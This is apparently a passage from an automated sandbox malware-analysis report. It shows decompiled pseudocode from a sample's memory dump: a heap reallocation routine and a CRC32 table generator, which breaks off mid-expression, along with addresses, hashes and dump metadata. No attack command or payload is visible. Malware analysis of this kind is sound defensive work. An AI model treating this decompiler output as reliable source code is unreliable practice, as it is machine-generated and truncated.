				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}
























































                                          0x004162ac
                                          0x004162b5
                                          0x004162c0
                                          0x004162c3
                                          0x004162c6
                                          0x004162d8
                                          0x004162de
                                          0x004162e1
                                          0x004162e4
                                          0x004162e8
                                          0x004162ec
                                          0x004162ef
                                          0x00416454
                                          0x0041645a
                                          0x0041645d
                                          0x00416460
                                          0x00416463
                                          0x00416466
                                          0x0041646d
                                          0x00416473
                                          0x00416474
                                          0x00416477
                                          0x0041647a
                                          0x0041647e
                                          0x0041647e
                                          0x0041647f
                                          0x00416483
                                          0x0041648f
                                          0x00416490
                                          0x00416493
                                          0x00416497
                                          0x00416497
                                          0x0041649b
                                          0x0041649e
                                          0x004164a0
                                          0x004164a3
                                          0x004164c3
                                          0x004164cd
                                          0x004164cd
                                          0x004164d1
                                          0x004164d3
                                          0x004164da
                                          0x004164da
                                          0x004164dc
                                          0x004164de
                                          0x004164e1
                                          0x004164e1
                                          0x004164e1
                                          0x004164e1
                                          0x004164a5
                                          0x004164ae
                                          0x004164b2
                                          0x004164b4
                                          0x004164b8
                                          0x004164b8
                                          0x004164ba
                                          0x004164bf
                                          0x004164bf
                                          0x004164ba
                                          0x004164e4
                                          0x004164e4
                                          0x004164ed
                                          0x004164f6
                                          0x004164fc
                                          0x004164ff
                                          0x00416505
                                          0x00416506
                                          0x00416509
                                          0x0041650d
                                          0x0041650d
                                          0x00416509
                                          0x0041650e
                                          0x00416515
                                          0x00416518
                                          0x0041651b
                                          0x0041651e
                                          0x00416524
                                          0x0041652a
                                          0x0041652d
                                          0x0041652f
                                          0x00416533
                                          0x00416536
                                          0x00416539
                                          0x00416539
                                          0x0041653b
                                          0x0041653f
                                          0x00416562
                                          0x00416566
                                          0x00416572
                                          0x00416575
                                          0x00416575
                                          0x00416575
                                          0x00416575
                                          0x00416578
                                          0x0041657f
                                          0x00416582
                                          0x00416541
                                          0x00416541
                                          0x00416545
                                          0x00416550
                                          0x00416553
                                          0x00416553
                                          0x00416553
                                          0x00416555
                                          0x00416559
                                          0x0041655e
                                          0x0041655e
                                          0x00416589
                                          0x00416589
                                          0x00416589
                                          0x0041658b
                                          0x0041658e
                                          0x00416590
                                          0x00416590
                                          0x00416594
                                          0x00416596
                                          0x00000000
                                          0x00416596
                                          0x004162f8
                                          0x00000000
                                          0x00416308
                                          0x0041630e
                                          0x00416312
                                          0x00416315
                                          0x00416319
                                          0x0041631a
                                          0x0041631a
                                          0x00416323
                                          0x00416328
                                          0x00416356
                                          0x0041635a
                                          0x0041635c
                                          0x00416363
                                          0x00416363
                                          0x00416365
                                          0x00416367
                                          0x0041636a
                                          0x0041636a
                                          0x0041636a
                                          0x0041636a
                                          0x0041632a
                                          0x00416334
                                          0x00416338
                                          0x0041633a
                                          0x0041633e
                                          0x00416340
                                          0x00416345
                                          0x00416345
                                          0x00416340
                                          0x00416328
                                          0x00416373
                                          0x0041637c
                                          0x00416384
                                          0x0041638b
                                          0x0041643b
                                          0x00416391
                                          0x0041639a
                                          0x0041639b
                                          0x004163a2
                                          0x004163a6
                                          0x004163a6
                                          0x004163aa
                                          0x004163ad
                                          0x004163b3
                                          0x004163b6
                                          0x004163b9
                                          0x004163bc
                                          0x004163c2
                                          0x004163cb
                                          0x004163cd
                                          0x004163d4
                                          0x004163d7
                                          0x004163d9
                                          0x004163dd
                                          0x00416400
                                          0x00416404
                                          0x00416406
                                          0x00416410
                                          0x00416413
                                          0x00416413
                                          0x00416413
                                          0x00416413
                                          0x00416416
                                          0x0041641d
                                          0x0041641d
                                          0x00416420
                                          0x004163df
                                          0x004163e3
                                          0x004163f1
                                          0x004163f1
                                          0x004163f3
                                          0x004163f7
                                          0x004163fc
                                          0x004163fc
                                          0x00416427
                                          0x00416427
                                          0x00416429
                                          0x0041642c
                                          0x0041642f
                                          0x00416433
                                          0x00416435
                                          0x00416435
                                          0x0041643e
                                          0x00416441
                                          0x00416444
                                          0x00000000
                                          0x00416444

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                          • Instruction ID: ff32ffadf5a964956f90e5d4d875ac86f6d3b74cc38b5144254d495ff0ae7514
                                          • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                          • Instruction Fuzzy Hash: D3B18E75A0020ADFDB15CF04C5D0AE9BBA2BF58318F25C19EC85A4B346C735EE82CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403A01 Relevance: .1, Instructions: 82COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403A01() {
				void* _t37;
				signed int _t38;
				signed int _t72;

				_t72 = 0;
				do {
					 *(0x4236c0 + _t72 * 4) =  !((( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 